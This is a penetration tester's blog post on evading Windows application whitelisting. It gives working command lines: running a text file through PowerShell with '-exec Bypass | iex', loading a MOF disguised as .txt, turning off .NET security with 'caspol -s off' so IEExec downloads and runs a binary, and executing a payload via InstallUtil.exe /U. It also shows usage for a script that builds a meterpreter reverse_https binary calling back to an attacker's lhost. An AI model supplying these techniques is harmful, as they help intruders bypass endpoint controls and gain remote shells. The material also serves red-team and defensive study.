I had been sitting on this for awhile. Really. I was just waiting for the opportunity to present itself for myself and my colleague to throw the proverbial kitchen sink at an application-whitelisted machine. Ever since this [talk], performing a practical “real-world” test of these whitelist evasion techniques has been #1 on my TO-DO list. And finally, the opportunity presented itself. Also, much like any post lately, there is some cool code (on my [github] finally! yay!)
Or… how to evade silly file extension blocks. Using the examples from subTee’s talk also worked very admirably in our tests. The key is here is this could be expanded beyond batch, vba, ps1. For example, the update to my [mof persist module] incorporates this trick as mofcomp is called to execute against a text file with .txt extension vice .mof, which is often blocked. A few examples:
C:\> cmd.exe /K > something.txt C:\> powershell -exec Bypass Get-Content test.txt | iex C:\> mofcomp moftest.txt
Powershell, in general, is usually a good candidate for evading application whitelisting, i.e the basis for this [blogpost]. However, in case powershell may be booby-trapped by a security appliance (which I did see during this last test), the following .NET sponsors below may aid in evasion.
If you have administrative privileges, then this sponsor seems to work very well. The trick to get anything that touches the disk to run is to temporarily disable .NET security policies via caspol:
C:\Windows\Microsoft .NET\Framework\v2.0.50727> caspol -s off
Once this has been done, IEExec will download and execute a .NET binary. Below it what appears to TCPView and Process Explorer:
Without administrative privileges (or caspol still enabled), we observe different behaviors. We can get a WinForm with “hello world” to open, but anything useful such as file read/write, executing a binary, even calling the OpenFileDialog class causes a “System.Net.Security” access violation. The crazy thing here, though, is that calling System.Net.Webclient and downloading a string is allowed, leaving room to at least pull in strings from webpages.
Maybe this could allow a vector of attack that could gain remote code execution of an untrusted binary (for example, sandbox escape as in MS14-009)? The skeleton application & source I used to perform these tests can be found [here].
Another weird caveat is that on default Win7 x64, IEExec will error out attempting to run 32-bit PE (even in the non-64 Framework directory). While there may be ways to force 32-bit mode (corflags from the SDK) this may not be present on the system, and may also require administrative privileges.
Uses the System.Configuration.Install .NET class. Code that gets executed with /Uninstall flag. The main class is never called using the InstallUtil /Unistall flag, so diversionary garbage could be added to aid in complicating the reversing of the binary! Another plus, is that InstallUtil does not seem to require admin to run and nothing other than the binary is required for successful execution. Trick is, how to get binary on disk? (This is an exercise for the reader, but a few hints: Bitsadmin, powershell download, etc…) To leverage this, one would simply build a .NET binary that has an instance of System.Configuration.Install with an Uninstall class, compiled to correct architecture and target framework. Then simply push the binary to disk and execute:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U uninstall.exe
So what does this .NET binary need to look like? Well, subTee was kind enough to produce a template [here]. Taking the template from the IEExec blogpost from infosecsmith2 [here], we can very easily push msfvenom output into this source and generate our binary. But alas, there should be a way to automate all of this. Enter python to the rescue (I still write in python from time to time)! Looking for an all one solution that would generate and compile the binary in a linux environment, this [script] requires mono (mcs), python, metasploit (msfvenom). Easiest way to ensure these are present are to install [Veil-Evasion], as these are also the requirements needed to compile any of the c# packages. Syntax to push a binary are as such:
Usage: python InstallUtil.py [--cs_file cs_filename] [--exe_name exe_filename] [--payload payload] [--lhost lhost] [--lport lport]
python InstallUtil.py --cs_file temp.cs --exe_name temp.exe --payload windows/meterpreter/reverse_https --lhost 192.168.1.11 --lport 443
Also, check out [Malwaria] from subTee which can accomplish the same thing by packing a dll inside the binary, and so much more. As of this draft, I had yet to do more that insert a msfvenom generated dll, but I am fairly certain any dll would suffice to perform what ever your hacker heart desired 🙂